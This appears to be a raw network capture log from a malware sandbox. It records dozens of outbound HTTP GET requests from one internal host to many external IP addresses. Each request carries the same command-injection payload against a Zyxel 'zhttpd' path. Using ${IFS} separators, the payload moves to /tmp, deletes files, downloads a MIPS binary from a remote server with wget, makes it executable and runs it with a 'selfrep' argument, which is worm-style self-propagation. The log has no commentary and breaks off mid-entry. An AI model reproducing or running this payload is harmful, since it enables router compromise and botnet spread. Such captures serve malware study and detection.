                                      Jan 19, 2024 17:29:27.685301065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3406192.168.2.144863282.248.32.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.685354948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3407192.168.2.144063031.228.79.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.685405970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3408192.168.2.1456434132.198.159.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.688386917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3409192.168.2.1436322223.231.24.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.688425064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3410192.168.2.146084498.27.248.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.688453913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3411192.168.2.1440114146.54.42.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.691287994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3412192.168.2.145648253.134.8.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.691318989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3413192.168.2.1438416164.225.137.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.691368103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3414192.168.2.145002265.96.206.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.691431999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3415192.168.2.1435682188.251.71.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.691467047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3416192.168.2.145725267.106.90.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.691581011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3417192.168.2.143420670.62.244.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.691596985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3418192.168.2.144476495.106.203.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.691690922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3419192.168.2.143895818.80.116.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.691755056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3420192.168.2.144040472.134.83.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.691803932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3421192.168.2.144699484.19.185.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.691854000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3422192.168.2.1457798124.202.201.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.691901922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3423192.168.2.1451612122.15.29.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.691934109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3424192.168.2.1446074106.44.191.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.691956043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3425192.168.2.1450394217.207.80.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.691998959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3426192.168.2.1456370105.133.42.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692028999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3427192.168.2.144750838.13.174.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692070007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3428192.168.2.14442701.21.178.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692106009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3429192.168.2.1449548112.255.111.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692137003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3430192.168.2.143695420.15.8.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692188978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3431192.168.2.1449708162.146.124.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692222118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3432192.168.2.14584249.244.189.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692255974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3433192.168.2.144132475.146.90.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692306042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3434192.168.2.146070612.52.54.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692349911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3435192.168.2.145055675.94.163.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692375898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3436192.168.2.1434102157.169.70.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692429066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3437192.168.2.144411024.236.199.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692461967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3438192.168.2.1441052140.246.122.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692500114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3439192.168.2.145823614.127.113.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692532063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3440192.168.2.143919892.90.182.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692580938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3441192.168.2.1434244150.202.212.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692617893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3442192.168.2.1444386177.251.244.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692634106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3443192.168.2.1459484120.227.0.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692678928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3444192.168.2.1459104138.77.214.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692722082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3445192.168.2.1440104118.160.57.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692775965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3446192.168.2.1444148186.159.96.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692811966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3447192.168.2.146038085.218.152.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692852020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3448192.168.2.143489285.85.112.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692866087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3449192.168.2.144040266.224.24.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692948103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3450192.168.2.1437410151.207.204.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.692979097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3451192.168.2.144411041.58.111.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693037033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3452192.168.2.1460956143.249.113.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693095922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3453192.168.2.1445954180.60.143.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693111897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3454192.168.2.14446945.95.249.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693164110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3455192.168.2.144412695.213.173.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693207979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3456192.168.2.1456800160.227.133.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693252087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3457192.168.2.1449892182.95.176.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693284988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3458192.168.2.1452830147.39.40.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693310022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3459192.168.2.145842066.196.126.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693347931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3460192.168.2.145721438.7.35.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693392992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3461192.168.2.14507862.5.174.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693428040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3462192.168.2.1452728159.177.223.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693455935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3463192.168.2.145110287.222.218.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693507910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3464192.168.2.144803081.200.11.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693558931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3465192.168.2.144909471.10.214.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693577051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3466192.168.2.1453170219.237.154.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693594933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3467192.168.2.1453886180.58.81.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693629026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3468192.168.2.1452330205.153.98.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693696976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3469192.168.2.1440726194.112.84.167443
                                      TimestampBytes transferredDirectionData
